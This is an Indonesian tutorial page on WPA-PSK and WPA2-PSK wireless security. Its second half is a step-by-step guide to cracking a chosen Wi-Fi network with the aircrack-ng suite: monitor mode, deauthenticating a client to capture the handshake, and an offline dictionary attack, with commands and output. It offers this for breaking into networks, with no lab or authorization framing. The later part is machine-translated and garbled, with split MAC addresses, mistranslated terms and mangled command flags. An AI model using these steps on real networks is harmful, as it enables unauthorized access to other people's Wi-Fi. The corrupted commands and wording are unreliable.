Anda di halaman 1dari 5

1.

WPA-PSK WPA-PSK (Wi-Fi Protected Access Pre Shared Key) adalah pengamanan jaringan nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.

2. WPA2-PSK

WPA2-PSK adalah security terbaru untuk wireless, dan lebih bagus dari WEP dan WPAPSK, tetapi masih bisa untuk dicrack atau disadap tetapi sangat memakan banyak waktu. Dalam WPA2-PSK ada dua jenis decryption, Advanced Encryption Standard (AES) dan Temporal Key Integrity Protocol (TKIP). TKIP banyak kelemahan oleh itu lebih baik anda gunakan AES. Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa). 3. CARA KERJA WPA-PSK DAN WPA2-PSK pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang digunakan. Keadaan ini berbanding terbalik dengan akses point Linksys WRT54G, dimana administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari algoritma TKIP atau algoritma AES. Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan metoda Shared-Key.

4. PERBEDAAN WPA-PSK DENGAN WPA2-PSK WPA-PSK WPA-PSK adalah security yang lebih update dari WEP. WPA-PSK mempunyai decryption yang ada pada WEP. Malah ia menambahkan security yang lebih pada wireless anda. WPA-PSK masih bisa dicrack atau disadap, tetapi mengambil masa lebih lama dari WEP. Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa). WPA2-PSK memakai sistem Advanced Encryption Standard (AES) dan Temporal Key Integrity Protocol
(TKIP) Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa).

5. CARA CRAK ATAU BOBOL


A. WPA-PSK Trik ini menggunakan Backtrack OS Linux, masuk keterminal dan lakukan printah :

1. root@bt:-# airmon-ng 2. root@bt:-# airmon-ng stop wlan0 3. root@bt:-# airmon-ng start wlan0 4. root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang
terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian ch yaitu berarti chanel yg harus di ingat)

5. root@bt:-# airodump-ng -c 6 -w zhome bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid


yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack, setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka terminal kedua dan ketikan)

6. root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian


lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard ctrl+c)

7. root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de


adalah dictionary passpharase bawaan backtrack)

B. WPA2-PSK

1. Masukkan antarmuka mode monitor 2. Cari jaringan nirkabel (dilindungi dengan WPA2 dan Pre Shared Key) 3. Ambil semua paket 4. Tunggu sampai Anda melihat deauthenticate klien dan klien, sehingga jabat tangan

yang dapat ditangkap


5. Crack tombol menggunakan file kamus (atau melalui John The Ripper) 6. Saya akan menggunakan DWL Teknis-G122 (USB) interface jaringan nirkabel

untuk prosedur ini. Dalam backtrack4, perangkat ini diakui sebagai wlan0. Pertama, memasukkan kartu ke dalam mode monitor:

root @ bt: ~ # airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root @ bt: ~ # airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (Monitor mode diaktifkan pada mon0)

7. Temukan jaringan nirkabel yang menggunakan WPA2 / PSK:


root @ bt: ~ # airodump-ng mon0 CH 6] [TERPAKAI: 4 s] [2009/02/21 00:57 BSSID PWR Beacons # Data, # / s CH MB AUTH ESSID Cipher enc 00:19:05 B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Lost Tingkat Probe Paket 00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -29 0-1 12 4 TestNet

8. Berhenti airodump-ng dan jalankan lagi, menulis semua paket ke disk:


mon0 airodump-ng - channel 10 - 00:19:05 bssid B: 52: AD: F7-w / tmp/wpa2

9. Pada titik ini, Anda punya opsi 2: baik menunggu sampai klien menghubungkan dan jabat tangan 4-arah yang lengkap, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita kekuatan deauthenticate tersebut. Kami membutuhkan bssid dari AP (-a) dan mac dari klien yang terhubung (-c)
root @ bt: ~ # aireplay-ng -0 1-a 00:19:05 B: 52: AD: F7-c 00:01 C: BF: 90:5 B: mon0 A3 13:04:19 Menunggu frame suar (BSSID: 00:19:05 B: 52: AD: F7) pada saluran 10 Mengirim 13:04:20 diarahkan DeAuth 64. STMAC: [00:01 C: BF: 90:5 B: A3] [67 | 66 ACK] Akibatnya, airodump-ng harus menunjukkan "WPA Handshake:" di sudut kanan atas CH 10] [TERPAKAI: 2 menit] [2009/02/21 13:04] [jabat tangan WPA: 00:19:05 B: 52: AD: F7 BSSID PWR Beacons # Data RXQ, # / s CH MB AUTH ESSID Cipher enc 00:19:05 B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Lost Tingkat Probe Paket 00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -27 54-54 0 230

10. Berhenti airodump-ng dan pastikan file diciptakan dengan benar


root @ bt: / # ls / tmp/wpa2 *-al Rw-r - r - 1 root root 35189 2009/02/21 13:04 / tmp/wpa2-01.cap Rw-r - r - 1 root root 476 2009/02/21 13:04 / tmp/wpa2-01.csv Rw-r - r - 1 root root 590 2009/02/21 13:04 / tmp/wpa2-01.kismet.csv

11. Formulir titik ini, Anda tidak perlu mendekati jaringan nirkabel. Semua cracking akan terjadi offline, sehingga Anda dapat berhenti airodump dan proses lainnya dan bahkan berjalan jauh dari AP. Bahkan, saya sarankan untuk pergi dan menemukan sendiri tempat yang nyaman di mana Anda dapat tinggal, makan, tidur, dll .... Cracking kunci PSK WPA2 didasarkan pada bruteforcing, dan dapat memakan waktu yang sangat sangat lama. Ada 2 cara bruteforcing: salah satu yang relatif cepat namun tidak menjamin kesuksesan dan salah satu yang sangat lambat, tapi menjamin bahwa Anda akan menemukan tombol di beberapa titik waktu. Opsi pertama adalah dengan menggunakan worklist suatu / file drstionary. Banyak file-file ini dapat ditemukan di internet (misalnya www.theargon.com atau di packetstorm (lihat arsip)), atau dapat dihasilkan dengan alat seperti John The Ripper. Setelah wordlist yang dibuat, semua yang perlu Anda lakukan adalah menjalankan aircrack-ng dengan worklist dan pakan dalamnya fie tutup yang berisi Handshake WPA2.. Jadi jika Anda wordlist disebut word.lst (bawah / tmp / wordlists), Anda dapat menjalankan :
aircrack-ng-w / tmp / wordlists / word.lst-b 00:19:05 B: 52: AD: F7 / tmp/wpa2 topi *

12.Keberhasilan retak tombol WPA2 PSK secara langsung terkait dengan kekuatan file password Anda. Dengan kata lain, Anda mungkin beruntung dan mendapatkan kunci yang sangat cepat, atau Anda mungkin tidak mendapatkan kunci sama sekali.

REFERENSI

- http://raytkj.blogspot.com/2012/05/perbedaan-security-wireless-wpa-wpa2.html - http://jempol-jempolan.blogspot.com/2011/12/cara-crack-wi-fi-wpa-dan-wpa2-psk.html - http://masddy.web.id/index.php?option=com_content&view=article&id=58&Itemid=64 - http://youngndifferent.blogspot.com/2012/12/pengertian-wep-wpa-wpa2-psk-dan.html - http://www.alongrhs.co.nr/